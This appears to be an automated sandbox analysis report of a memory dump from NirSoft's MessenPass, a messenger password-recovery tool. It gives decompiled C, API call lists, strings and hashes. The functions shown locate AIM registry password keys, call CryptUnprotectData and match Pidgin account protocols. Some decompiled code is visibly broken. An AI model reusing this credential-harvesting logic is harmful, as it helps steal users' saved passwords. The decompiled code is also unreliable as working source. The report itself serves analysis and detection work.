                                0x00404850
                                0x00404852
                                0x00404852
                                0x00404850
                                0x00000000
                                0x00404814
                                0x00404754
                                0x00404758
                                0x00000000
                                0x00000000
                                0x00404763
                                0x00404766
                                0x00404769
                                0x00404773
                                0x00404802
                                0x00404805
                                0x0040480e
                                0x00000000
                                0x00000000
                                0x00000000
                                0x0040480e
                                0x00404779
                                0x0040477b
                                0x0040477b
                                0x00404786
                                0x0040478e
                                0x0040478f
                                0x00404797
                                0x0040479b
                                0x004047a1
                                0x004047b3
                                0x004047ba
                                0x004047c8
                                0x004047ca
                                0x004047d4
                                0x004047d6
                                0x004047d6
                                0x004047e3
                                0x004047e8
                                0x004047ee
                                0x004047f5
                                0x004047fb
                                0x004047fb
                                0x00000000
                                0x00404649
                                0x00404649
                                0x0040464e
                                0x00404657
                                0x00404659
                                0x00404659
                                0x00404659
                                0x0040465f
                                0x00404667
                                0x0040466c
                                0x0040466f
                                0x00404671
                                0x00000000
                                0x00000000
                                0x0040467c
                                0x0040467f
                                0x00404682
                                0x0040468c
                                0x00404742
                                0x00404745
                                0x00000000
                                0x00404745
                                0x00404692
                                0x00404694
                                0x00404694
                                0x0040469f
                                0x004046a7
                                0x004046a8
                                0x004046b0
                                0x004046b4
                                0x004046ba
                                0x004046cc
                                0x004046d3
                                0x004046e1
                                0x004046e3
                                0x004046ed
                                0x004046ef
                                0x004046ef
                                0x004046f8
                                0x00404700
                                0x00404708
                                0x00404714
                                0x00404719
                                0x0040471e
                                0x00404720
                                0x0040472b
                                0x00404731
                                0x00404735
                                0x0040473c
                                0x0040473c
                                0x00000000
                                0x004046e1
                                0x00404857
                                0x0040485a
                                0x0040485d
                                0x00404868
                                0x00404870
                                0x0040486a
                                0x0040486a
                                0x0040486a
                                0x00404874
                                0x00404885
                                0x0040488d
                                0x00404624
                                0x00404624
                                0x00404624
                                0x00404626
                                0x00404629
                                0x0040462e
                                0x00404631
                                0x00000000
                                0x00000000
                                0x00000000
                                0x00404631

                                APIs
                                • wcslen.MSVCRT ref: 0040459A
                                • memset.MSVCRT ref: 004045BA
                                • wcschr.MSVCRT ref: 0040464E
                                • _wcsncoll.MSVCRT ref: 00404667
                                • memcpy.MSVCRT ref: 00404700
                                • wcschr.MSVCRT ref: 00404714
                                • wcscpy.MSVCRT ref: 0040472B
                                • memcpy.MSVCRT ref: 004047E3
                                • LocalFree.KERNEL32(?,?,?,?,?,?), ref: 004047F5
                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0040473C
                                  • Part of subcall function 00404CE0: FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB
                                • memcpy.MSVCRT ref: 0040483B
                                  • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                  • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Freememcpy$LibraryLocalwcschr$AddressLoadProc_wcsncollmemsetwcscpywcslen
                                • String ID: ?L@$Microsoft_WinInet
                                • API String ID: 1802959924-2674056311
                                • Opcode ID: fe56d977aabb073792e25c405abe676263accf88416be629dc76c317c79dc49e
                                • Instruction ID: 38d9b8d34b298c31677a0e9ec7c60157448ec74f6fc12d2487dcaf445e5773ed
                                • Opcode Fuzzy Hash: fe56d977aabb073792e25c405abe676263accf88416be629dc76c317c79dc49e
                                • Instruction Fuzzy Hash: 7FA16DB6D002199BDF10DFA5D844AEEB7B8FF44304F00846BEA19F7281E7789A45CB95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004137CE, Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringCOMMON
                                Download Yara Rule
                                APIs
                                • memset.MSVCRT ref: 004137F3
                                  • Part of subcall function 00413646: strlen.MSVCRT ref: 00413653
                                • strlen.MSVCRT ref: 0041380F
                                • memset.MSVCRT ref: 00413849
                                • memset.MSVCRT ref: 0041385D
                                • memset.MSVCRT ref: 00413871
                                • memset.MSVCRT ref: 00413897
                                  • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C9BA
                                  • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9E6
                                  • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040C9FC
                                  • Part of subcall function 0040C9C7: memcpy.MSVCRT ref: 0040CA33
                                  • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA3D
                                • memcpy.MSVCRT ref: 004138CE
                                  • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C96C
                                  • Part of subcall function 0040C929: memcpy.MSVCRT ref: 0040C996
                                  • Part of subcall function 0040C9C7: memset.MSVCRT ref: 0040CA0E
                                • memcpy.MSVCRT ref: 0041390A
                                • memcpy.MSVCRT ref: 0041391C
                                • _mbscpy.MSVCRT ref: 004139F3
                                • memcpy.MSVCRT ref: 00413A24
                                • memcpy.MSVCRT ref: 00413A36
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpymemset$strlen$_mbscpy
                                • String ID: salu
                                • API String ID: 3691931180-4177317985
                                • Opcode ID: a28751cfe978eb37453970bb265a1e64262579446a4253816dc0a22a7f9660ca
                                • Instruction ID: 50f97ef88cf8910c77a3c81ceda6bafe80676b1d4533e7ed44b9b26706654b38
                                • Opcode Fuzzy Hash: a28751cfe978eb37453970bb265a1e64262579446a4253816dc0a22a7f9660ca
                                • Instruction Fuzzy Hash: 48712DB290011DAADF10EF95DC819DE77B8BF08348F1445BAF548E7141DB78AB888F95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00403EDF, Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 103COMMON
                                Download Yara Rule
                                C-Code - Quality: 64%
                                			E00403EDF(intOrPtr* __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a117889) {
				intOrPtr* _v8;
				char _v76;
				void _v1099;
				char _v1100;
				void _v2123;
				char _v2124;
				void _v3147;
				char _v3148;
				char _v4172;
				void* __ebx;
				void* __esi;
				void* _t41;
				void* _t42;
				void* _t53;
				void* _t59;
				signed int _t63;
				intOrPtr* _t69;
				void* _t79;
				void* _t82;
				void* _t83;
				intOrPtr _t88;
				intOrPtr _t89;

				 *__eax =  *__eax + __eax;
				_a117889 = _a117889 + 0xc8;
				 *0x0008F951 =  *((intOrPtr*)(0x8f951)) + 0xc8;
				asm("adc [edx+0x55c30000], dh");
				0x414060(_t79);
				_t69 = 0xc8;
				_v8 = 0xc8;
				E004067EC(_a4, "<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">");
				_v1100 = 0;
				memset( &_v1099, 0, 0x3ff);
				_v3148 = 0;
				memset( &_v3147, 0, 0x3ff);
				_v2124 = 0;
				memset( &_v2123, 0, 0x3ff);
				_t83 = _t82 + 0x2c;
				_t88 =  *0x41e350; // 0x0
				if(_t88 != 0) {
					_push(0x41e350);
					sprintf( &_v3148, "<meta http-equiv='content-type' content='text/html;charset=%s'>");
					_t83 = _t83 + 0xc;
				}
				_t89 =  *0x41e34c; // 0x0
				if(_t89 != 0) {
					0x413d0c( &_v1100, "<table dir="rtl"><tr><td>");
				}
				_t41 =  *((intOrPtr*)( *_t69 + 0x1c))();
				_t63 = 0x10;
				_push(_t41);
				_t42 = memcpy( &_v76, 0x419278, _t63 << 2);
				asm("movsb");
				sprintf( &_v4172,  &_v76,  &_v3148, _t42,  &_v1100);
				E004067EC(_a4,  &_v4172);
				_push("MessenPass");
				_t59 = 6;
				_push(E0040876F(_t59));
				sprintf( &_v2124, "<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>");
				_t53 = E004067EC(_a4,  &_v2124);
				_t90 = _a8 - 4;
				if(_a8 == 4) {
					_t53 = E0040A5A6(_v8, _t90, _a4);
				}
				return _t53;
			}

























                                0x00403ee1
                                0x00403ee3
                                0x00403ee9
                                0x00403ef1
                                0x00403efe
                                0x00403f0e
                                0x00403f10
                                0x00403f13
                                0x00403f28
                                0x00403f2e
                                0x00403f3c
                                0x00403f42
                                0x00403f50
                                0x00403f56
                                0x00403f5b
                                0x00403f5e
                                0x00403f64
                                0x00403f66
                                0x00403f77
                                0x00403f7c
                                0x00403f7c
                                0x00403f7f
                                0x00403f85
                                0x00403f93
                                0x00403f99
                                0x00403f9e
                                0x00403fa3
                                0x00403fa4
                                0x00403fad
                                0x00403fc9
                                0x00403fca
                                0x00403fd9
                                0x00403fe1
                                0x00403fe8
                                0x00403fee
                                0x00403ffb
                                0x0040400a
                                0x00404012
                                0x00404016
                                0x0040401e
                                0x0040401e
                                0x00404027

                                APIs
                                  • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
                                  • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806
                                • memset.MSVCRT ref: 00403F2E
                                • memset.MSVCRT ref: 00403F42
                                • memset.MSVCRT ref: 00403F56
                                • sprintf.MSVCRT ref: 00403F77
                                • _mbscpy.MSVCRT ref: 00403F93
                                • sprintf.MSVCRT ref: 00403FCA
                                • sprintf.MSVCRT ref: 00403FFB
                                Strings
                                • <table dir="rtl"><tr><td>, xrefs: 00403F8D
                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403F06
                                • MessenPass, xrefs: 00403FE1
                                • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403FA5
                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F71
                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403FF5
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memsetsprintf$FileWrite_mbscpystrlen
                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$MessenPass
                                • API String ID: 113626815-2158351146
                                • Opcode ID: 00ac9a161666d359e30a85352218d100d67a3872f7ac0cc1d46ad38c70204dfb
                                • Instruction ID: 7e850c38df9f1f0d15d36b6f1642bcd7d5b849b9a1e92852595dac58af72d1cd
                                • Opcode Fuzzy Hash: 00ac9a161666d359e30a85352218d100d67a3872f7ac0cc1d46ad38c70204dfb
                                • Instruction Fuzzy Hash: 963195B2904258BFDB11DBA59C42EDE7BACAF14304F0440ABF508B7141DA799FC88B99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00403EF6, Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 98COMMON
                                Download Yara Rule
                                C-Code - Quality: 65%
                                			E00403EF6(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr* _v8;
				char _v76;
				void _v1099;
				char _v1100;
				void _v2123;
				char _v2124;
				void _v3147;
				char _v3148;
				char _v4172;
				void* __ebx;
				void* __esi;
				void* _t35;
				void* _t36;
				void* _t47;
				void* _t53;
				signed int _t57;
				intOrPtr* _t63;
				void* _t73;
				void* _t74;
				intOrPtr _t78;
				intOrPtr _t79;

				0x414060();
				_t63 = __ecx;
				_v8 = __ecx;
				E004067EC(_a4, "<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">");
				_v1100 = 0;
				memset( &_v1099, 0, 0x3ff);
				_v3148 = 0;
				memset( &_v3147, 0, 0x3ff);
				_v2124 = 0;
				memset( &_v2123, 0, 0x3ff);
				_t74 = _t73 + 0x2c;
				_t78 =  *0x41e350; // 0x0
				if(_t78 != 0) {
					_push(0x41e350);
					sprintf( &_v3148, "<meta http-equiv='content-type' content='text/html;charset=%s'>");
					_t74 = _t74 + 0xc;
				}
				_t79 =  *0x41e34c; // 0x0
				if(_t79 != 0) {
					0x413d0c( &_v1100, "<table dir="rtl"><tr><td>");
				}
				_t35 =  *((intOrPtr*)( *_t63 + 0x1c))();
				_t57 = 0x10;
				_push(_t35);
				_t36 = memcpy( &_v76, 0x419278, _t57 << 2);
				asm("movsb");
				sprintf( &_v4172,  &_v76,  &_v3148, _t36,  &_v1100);
				E004067EC(_a4,  &_v4172);
				_push("MessenPass");
				_t53 = 6;
				_push(E0040876F(_t53));
				sprintf( &_v2124, "<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>");
				_t47 = E004067EC(_a4,  &_v2124);
				_t80 = _a8 - 4;
				if(_a8 == 4) {
					_t47 = E0040A5A6(_v8, _t80, _a4);
				}
				return _t47;
			}
























                                0x00403efe
                                0x00403f0e
                                0x00403f10
                                0x00403f13
                                0x00403f28
                                0x00403f2e
                                0x00403f3c
                                0x00403f42
                                0x00403f50
                                0x00403f56
                                0x00403f5b
                                0x00403f5e
                                0x00403f64
                                0x00403f66
                                0x00403f77
                                0x00403f7c
                                0x00403f7c
                                0x00403f7f
                                0x00403f85
                                0x00403f93
                                0x00403f99
                                0x00403f9e
                                0x00403fa3
                                0x00403fa4
                                0x00403fad
                                0x00403fc9
                                0x00403fca
                                0x00403fd9
                                0x00403fe1
                                0x00403fe8
                                0x00403fee
                                0x00403ffb
                                0x0040400a
                                0x00404012
                                0x00404016
                                0x0040401e
                                0x0040401e
                                0x00404027

                                APIs
                                  • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
                                  • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806
                                • memset.MSVCRT ref: 00403F2E
                                • memset.MSVCRT ref: 00403F42
                                • memset.MSVCRT ref: 00403F56
                                • sprintf.MSVCRT ref: 00403F77
                                • _mbscpy.MSVCRT ref: 00403F93
                                • sprintf.MSVCRT ref: 00403FCA
                                • sprintf.MSVCRT ref: 00403FFB
                                Strings
                                • <table dir="rtl"><tr><td>, xrefs: 00403F8D
                                • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403F06
                                • MessenPass, xrefs: 00403FE1
                                • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403FA5
                                • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403F71
                                • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403FF5
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memsetsprintf$FileWrite_mbscpystrlen
                                • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>$MessenPass
                                • API String ID: 113626815-2158351146
                                • Opcode ID: c760e4dabb0e80b2edcbd537a5374e1093b1ba24307009f5b58eb46458df0706
                                • Instruction ID: 526b9c6c735ab5766b9493b9c4eecad717bc7371a22eeca07e3dbb649928e63f
                                • Opcode Fuzzy Hash: c760e4dabb0e80b2edcbd537a5374e1093b1ba24307009f5b58eb46458df0706
                                • Instruction Fuzzy Hash: 6E3187B2900218BADB51DB95DC42EDE7BACAF54304F0440A7F50CB7141DA799FC88B69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004062DB, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 168stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 53%
                                			E004062DB(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				int _v16;
				char _v20;
				char _v24;
				void* _v28;
				void _v1051;
				char _v1052;
				char _v2076;
				char _v3100;
				char _v4124;
				void _v5148;
				void _v6171;
				char _v6172;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t61;
				intOrPtr _t63;
				int _t79;
				int _t81;
				char* _t86;
				void* _t96;
				void* _t102;
				long _t104;
				char _t105;
				void* _t108;

				0x414060();
				_t61 = E004067BA(_a8);
				_t108 = _t61;
				_t96 = _t102;
				_v28 = _t108;
				if(_t108 != 0xffffffff) {
					_t104 = GetFileSize(_t108, 0);
					if(_t104 > 0) {
						_t3 = _t104 + 1; // 0x1
						_t63 = _t3;
						0x413d5c(_t63);
						_v12 = _t63;
						E00406ED6(_t96, 0, _t108, _t63, _t104);
						 *((char*)(_v12 + _t104)) = 0;
						_v24 = 0;
						_v1052 = 0;
						memset( &_v1051, 0, 0x3ff);
						_t105 = 0;
						_v16 = 0;
						_v20 = 0;
						_v8 = 0;
						_v6172 = 0;
						memset( &_v6171, 0, 0x3ff);
						memset( &_v5148, 0, 0x1000);
						if(E004060C4(_v12, _t96,  &_v1052,  &_v24) != 0) {
							L5:
							while(1) {
								if(_v16 > 0) {
									_t79 = strcmp( &_v1052, 0x4181f4);
									_pop(_t96);
									if(_t79 != 0) {
										__eflags = _v20;
										if(_v20 != 0) {
											__eflags = _t105;
											if(_t105 != 0) {
												__eflags = _t105 - 1;
												if(_t105 != 1) {
													__eflags = _t105 - 2;
													if(_t105 != 2) {
														__eflags = _t105 - 3;
														if(_t105 != 3) {
															__eflags = _t105 - 4;
															if(__eflags != 0) {
																if(__eflags > 0) {
																	__eflags = _v1052;
																	if(_v1052 == 0) {
																		L26:
																		_v8 = 0;
																	} else {
																		_t81 = strcmp( &_v1052, "---");
																		__eflags = _t81;
																		_pop(_t96);
																		if(_t81 == 0) {
																			goto L26;
																		}
																	}
																}
															} else {
																0x413d0c( &_v4124,  &_v1052);
																_pop(_t96);
																E0040623F(_a4,  &_v6172, _a8);
																_v5148 = 0;
																_v4124 = 0;
																_v3100 = 0;
																_v2076 = 0;
															}
														} else {
															_push( &_v1052);
															_t86 =  &_v2076;
															goto L20;
														}
													} else {
														_push( &_v1052);
														_t86 =  &_v5148;
														goto L20;
													}
												} else {
													_push( &_v1052);
													_t86 =  &_v3100;
													goto L20;
												}
											} else {
												_push( &_v1052);
												_t86 =  &_v6172;
												L20:
												0x413d0c();
												_t96 = _t86;
											}
											_t51 =  &_v8;
											 *_t51 = _v8 + 1;
											__eflags =  *_t51;
										}
									} else {
										if(_v20 == 0) {
											_v20 = 1;
										} else {
											_v5148 = 0;
											_v4124 = 0;
											_v3100 = 0;
											_v2076 = 0;
											_v6172 = 0;
										}
										_v8 = 0;
									}
								}
								_v16 = _v16 + 1;
								if(E004060C4(_v12, _t96,  &_v1052,  &_v24) != 0) {
									_t105 = _v8;
									continue;
								}
								goto L29;
							}
						}
						L29:
						0x413d56(_v12);
					}
					_t61 = CloseHandle(_v28);
				}
				return _t61;
			}






























                                0x004062e3
                                0x004062ee
                                0x004062f3
                                0x004062f8
                                0x004062f9
                                0x004062fc
                                0x0040630c
                                0x00406310
                                0x00406316
                                0x00406316
                                0x0040631a
                                0x00406324
                                0x00406327
                                0x00406334
                                0x00406340
                                0x00406343
                                0x00406349
                                0x00406356
                                0x00406359
                                0x0040635c
                                0x0040635f
                                0x00406362
                                0x00406368
                                0x0040637a
                                0x00406397
                                0x00000000
                                0x004063a2
                                0x004063a7
                                0x004063b9
                                0x004063c1
                                0x004063c2
                                0x004063f8
                                0x004063fb
                                0x00406401
                                0x00406403
                                0x00406414
                                0x00406417
                                0x00406428
                                0x0040642b
                                0x0040643c
                                0x0040643f
                                0x00406458
                                0x0040645b
                                0x0040649d
                                0x0040649f
                                0x004064a5
                                0x004064be
                                0x004064be
                                0x004064a7
                                0x004064b3
                                0x004064b8
                                0x004064bb
                                0x004064bc
                                0x00000000
                                0x00000000
                                0x004064bc
                                0x004064a5
                                0x0040645d
                                0x0040646b
                                0x00406474
                                0x0040647e
                                0x00406483
                                0x00406489
                                0x0040648f
                                0x00406495
                                0x00406495
                                0x00406441
                                0x00406447
                                0x00406448
                                0x00000000
                                0x00406448
                                0x0040642d
                                0x00406433
                                0x00406434
                                0x00000000
                                0x00406434
                                0x00406419
                                0x0040641f
                                0x00406420
                                0x00000000
                                0x00406420
                                0x00406405
                                0x0040640b
                                0x0040640c
                                0x0040644e
                                0x0040644f
                                0x00406455
                                0x00406455
                                0x004064c1
                                0x004064c1
                                0x004064c1
                                0x004064c1
                                0x004063c4
                                0x004063c7
                                0x004063e9
                                0x004063c9
                                0x004063c9
                                0x004063cf
                                0x004063d5
                                0x004063db
                                0x004063e1
                                0x004063e1
                                0x004063f0
                                0x004063f0
                                0x004063c2
                                0x004064c7
                                0x004064dc
                                0x0040639f
                                0x00000000
                                0x0040639f
                                0x00000000
                                0x004064dc
                                0x004063a2
                                0x004064e2
                                0x004064e5
                                0x004064ea
                                0x004064ee
                                0x004064ee
                                0x004064f8

                                APIs
                                  • Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00406306
                                • ??2@YAPAXI@Z.MSVCRT ref: 0040631A
                                  • Part of subcall function 00406ED6: ReadFile.KERNELBASE(?,?,?,00000000,00000000,00000001,?,00404269,00000000,00000000,00000000), ref: 00406EED
                                • memset.MSVCRT ref: 00406349
                                • memset.MSVCRT ref: 00406368
                                • memset.MSVCRT ref: 0040637A
                                • strcmp.MSVCRT ref: 004063B9
                                • _mbscpy.MSVCRT ref: 0040644F
                                • _mbscpy.MSVCRT ref: 0040646B
                                • strcmp.MSVCRT ref: 004064B3
                                • ??3@YAXPAX@Z.MSVCRT ref: 004064E5
                                • CloseHandle.KERNEL32(?), ref: 004064EE
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Filememset$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                • String ID: ---
                                • API String ID: 3240106862-2854292027
                                • Opcode ID: 4eeeb57ccc19eee98041d890f7d1814f183a767c446dec136644f82088ed791d
                                • Instruction ID: 14ccde3f01574b0ce453d66bedc824b09869edf18580a01976bfbb4e6d9b59b2
                                • Opcode Fuzzy Hash: 4eeeb57ccc19eee98041d890f7d1814f183a767c446dec136644f82088ed791d
                                • Instruction Fuzzy Hash: A7517572C0415DAACF20DB949C819DEBBBCAF15314F1140FBE509B3181DA389BD98BAD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040E725, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 142registrystringCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                • memset.MSVCRT ref: 0040E768
                                • memset.MSVCRT ref: 0040E77C
                                • memset.MSVCRT ref: 0040E790
                                • memset.MSVCRT ref: 0040E7A8
                                  • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                • sprintf.MSVCRT ref: 0040E7D8
                                • strlen.MSVCRT ref: 0040E806
                                • _mbscpy.MSVCRT ref: 0040E888
                                • _mbscpy.MSVCRT ref: 0040E89B
                                • RegCloseKey.ADVAPI32(?), ref: 0040E8ED
                                Strings
                                • Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users, xrefs: 0040E735
                                • Password, xrefs: 0040E7DE
                                • %s\Login, xrefs: 0040E7D2
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$_mbscpy$CloseEnumOpensprintfstrlen
                                • String ID: %s\Login$Password$Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users
                                • API String ID: 1782299107-1248239246
                                • Opcode ID: c4d16bc47cbd25a94772c531631938f0df6b0302f4f9fef13228118c965c7629
                                • Instruction ID: fd41fae155906cc5ed66380c8c1da9a21ab341a1702a4efca81b6986be60196d
                                • Opcode Fuzzy Hash: c4d16bc47cbd25a94772c531631938f0df6b0302f4f9fef13228118c965c7629
                                • Instruction Fuzzy Hash: 4B41C4B2C0011CAEDB21EBA59C41BDEBBBC9F59304F4040EAE549A3101D6399F99CF68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004100A4, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 117registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExA.ADVAPI32(004104FD,Creds,00000000,00020019,004104FD,00000040,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,?,?,004104FD,?,?,?,?), ref: 004100C8
                                • memset.MSVCRT ref: 004100EA
                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00410117
                                • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 00410144
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 004101B2
                                • LocalFree.KERNEL32(?), ref: 004101C5
                                • RegCloseKey.ADVAPI32(?), ref: 004101D0
                                • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 004101E7
                                • RegCloseKey.ADVAPI32(?), ref: 004101F8
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Creds$ps:password
                                • API String ID: 551151806-1288872324
                                • Opcode ID: 20f5c7480319690d4c614e4d7b7dd4f29f763a09612276579ba8a91edcf23ce4
                                • Instruction ID: f68ec8314172e0547355e42bda77cc46fbcb66bc12c1f5db7d7ae7cb92940bd3
                                • Opcode Fuzzy Hash: 20f5c7480319690d4c614e4d7b7dd4f29f763a09612276579ba8a91edcf23ce4
                                • Instruction Fuzzy Hash: A141F5B2901119EFDB11DF95DC84EEFBBBCEF0C754F0040A6F905E2150EA359A949BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040E8FD, Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 100COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _strcmpi
                                • String ID: prpl-gg$prpl-irc$prpl-jabber$prpl-msn$prpl-novell$prpl-oscar$prpl-yahoo
                                • API String ID: 1439213657-1061492575
                                • Opcode ID: d08d5dad979f9fb4092b5930b19311ec033bd7c838c8b2128e13e64409b95641
                                • Instruction ID: 427b895755571877c56e738dc42ee4b060dd70cd0f3c6fd0f8b1603a1220432f
                                • Opcode Fuzzy Hash: d08d5dad979f9fb4092b5930b19311ec033bd7c838c8b2128e13e64409b95641
                                • Instruction Fuzzy Hash: 5031D6B124C3455ED730EE22954A7EB77D4AB90719F20082FF488A22C1EB7C59554B9F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00408EAA, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                Download Yara Rule
                                C-Code - Quality: 38%
                                			E00408EAA(struct HINSTANCE__* _a4, intOrPtr _a8, CHAR* _a12) {
				void _v4103;
				char _v4104;
				intOrPtr _t29;
				struct HMENU__* _t31;
				intOrPtr* _t37;
				struct HWND__* _t41;
				struct HMENU__* _t46;

				0x414060();
				if(_a8 != 4) {
					if(_a8 == 5) {
						_t37 =  *0x41e390; // 0x0
						if(_t37 == 0) {
							L8:
							_push(_a12);
							sprintf(0x41e308, "dialog_%d");
							_t41 = CreateDialogParamA(_a4, _a12, 0, E00408EA5, 0);
							_v4104 = 0;
							memset( &_v4103, 0, 0x1000);
							GetWindowTextA(_t41,  &_v4104, 0x1000);
							if(_v4104 != 0) {
								E00408CA1("caption",  &_v4104);
							}
							EnumChildWindows(_t41, E00408E37, 0);
							DestroyWindow(_t41);
						} else {
							while(1) {
								_t29 =  *_t37;
								if(_t29 == 0) {
									goto L8;
								}
								if(_t29 != _a12) {
									_t37 = _t37 + 4;
									continue;
								}
								goto L11;
							}
							goto L8;
						}
						L11:
					}
				} else {
					_push(_a12);
					sprintf(0x41e308, "menu_%d");
					_t31 = LoadMenuA(_a4, _a12);
					 *0x41e1fc =  *0x41e1fc & 0x00000000;
					_t46 = _t31;
					_push(1);
					_push(_t46);
